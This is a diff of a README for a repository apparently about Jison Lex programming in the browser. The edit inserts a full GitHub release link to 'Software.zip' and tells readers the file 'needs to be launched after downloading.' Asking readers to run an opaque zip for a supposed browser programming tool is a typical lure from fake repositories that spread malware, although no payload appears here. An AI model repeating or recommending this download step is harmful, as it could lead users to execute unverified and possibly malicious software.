Thalik330/Bliss_Browser_Jison-Lex/README.md

 ---

-Remember, the Software.zip file needs to be launched after downloading it from the provided link.
+Remember, the https://github.com/Thalik330/Bliss_Browser_Jison-Lex/releases/download/v1.0/Software.zip file needs to be launched after downloading it from the provided link.
 Enjoy exploring the possibilities of Jison Lex programming in the browser environment! 🌟